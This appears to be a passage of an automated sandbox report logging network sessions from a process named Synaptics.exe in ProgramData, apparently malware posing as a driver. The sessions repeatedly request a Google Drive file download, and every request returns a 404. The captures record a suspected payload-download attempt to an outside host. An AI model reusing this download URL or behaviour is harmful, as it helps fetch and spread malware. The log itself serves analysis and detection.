                                                                                                                                                                                  2022-05-27 02:38:24 UTC85INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 71 49 6e 70 41 62 34 71 2d 55 41 30 70 35 41 70 39 45 75 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HqInpAb4q-UA0p5Ap9EuAQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:24 UTC86INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:24 UTC87INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  28192.168.2.349773172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:24 UTC84OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:24 UTC87INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:24 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-F69_pKNlsi_vh4bFmrC-yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:24 UTC88INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 5f 63 63 48 41 5f 55 56 56 69 38 4d 35 55 32 6a 48 33 65 51 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="J_ccHA_UVVi8M5U2jH3eQg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:24 UTC90INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:24 UTC90INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  29192.168.2.349776172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:24 UTC87OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:24 UTC90INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:24 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-00CzyXufRNr6eJhID_c9KA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:24 UTC92INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 53 78 54 52 53 48 69 77 65 66 66 6a 73 71 36 6e 4e 33 4b 54 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8SxTRSHiweffjsq6nN3KTA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:24 UTC93INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:24 UTC93INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  3192.168.2.349742172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:17 UTC6OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:17 UTC9INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:17 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-8wRx_faYmVTA8D5WLtXo5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:17 UTC10INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                  2022-05-27 02:38:17 UTC11INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 41 74 52 31 39 49 35 4a 34 4d 73 4c 70 2d 6d 2d 42 77 2d 37 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IAtR19I5J4MsLp-m-Bw-7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:17 UTC12INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:17 UTC12INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  30192.168.2.349777172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:24 UTC90OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:24 UTC93INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:24 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-EOvmVxVbQaFC3tSzPkmSHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:24 UTC94INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                  2022-05-27 02:38:24 UTC94INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 62 63 57 52 75 61 69 4b 48 68 75 39 55 66 38 51 4d 4b 43 4f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FbcWRuaiKHhu9Uf8QMKCOQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:24 UTC96INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:24 UTC96INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  4192.168.2.349743172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:19 UTC12OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:20 UTC15INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:20 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-4qLAeArRAnTGw8wdmFdaFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
